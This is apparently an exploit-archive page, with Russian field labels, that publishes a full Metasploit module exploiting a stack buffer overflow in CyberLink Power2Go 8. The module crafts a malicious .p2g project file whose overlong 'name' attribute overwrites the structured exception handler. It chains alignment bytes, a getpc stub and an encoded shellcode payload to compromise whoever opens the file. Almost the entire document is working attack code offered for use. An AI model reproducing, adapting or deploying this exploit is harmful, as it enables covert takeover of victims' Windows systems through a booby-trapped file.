CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

Свойства

Дата публикации:
17.04.2012
Цель:
CyberLink Power2Go
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit',
            'Description'     => %q{
                    This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
                The vulnerability is triggered when opening a malformed p2g file containing an overly
                long string in the 'name' attribute of the file element. This results in overwriting a
                structured exception handler record.
            },
            'License'         => MSF_LICENSE,
            'Author'          =>
                [
                    'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
                    'mr_me <steventhomasseeley[at]gmail.com>' # msf module
                ],
            'References'      =>
                [
                    ['BID', '50997'],
                    ['OSVDB', '70600'],
                    ['URL', 'http://www.exploit-db.com/exploits/18220/';],
                    ['URL', 'http://www.kb.cert.org/vuls/id/158003';]
                ],
            'DefaultOptions'  =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'         =>
                {
                    'Space'    => 1024,
                    'BadChars' => "\x00"
                },
            'Platform'        => 'win',
            'Targets'         =>
                [
                    # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
                    [ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]
                ],
            'DisclosureDate'  => 'Sep 12 2011',
            'DefaultTarget'   => 0))

        register_options(
            [
                OptString.new('FILENAME', [ true, 'The output filename.', 'msf.p2g'])
            ], self.class)
    end

    def get_payload(hunter)
        
        [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
            enc = framework.encoders.create(name)
            if name =~ /unicode/
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
            else
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
            end
            # NOTE: we already eliminated badchars
            hunter = enc.encode(hunter, nil, nil, platform)
            if name =~/alpha/
                #insert getpc_stub & align EDX, unicode encoder friendly.
                #Hardcoded stub is not an issue here because it gets encoded anyway
                getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
                hunter = getpc_stub + hunter
            end
        }

        return hunter
    end

    def exploit

        title = rand_text_alpha(10)
        buffer =  ""
        buffer << rand_text_alpha(778)
        buffer << "\x58\x28"        # nseh
        buffer << target['Ret']     # seh
        buffer << "\x5f\x73" * 15   # pop edi/add [ebx],dh (after byte alignment)
        buffer << "\x58\x73"        # pop eax/add [ebx],dh (after byte alignment)
        buffer << "\x40\x73" * 3    # inc eax/add [ebx],dh (after byte alignment)
        buffer << "\x40"            # inc eax
        buffer << "\x73\x42" * 337  # add [ebx],dh/pop edx (after byte alignment)
        buffer << "\x73"            # add [ebx],dh (after byte alignment)
        buffer << get_payload(payload.encoded)

        p2g_data = <<-EOS
        <Project magic="#{title}" version="101">
        <Information />
            <Compilation>
                <DataDisc>
                    <File name="#{buffer}" />
                </DataDisc>
            </Compilation>
        </Project>
        EOS

        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(p2g_data)
    end
end

или введите имя

CAPTCHA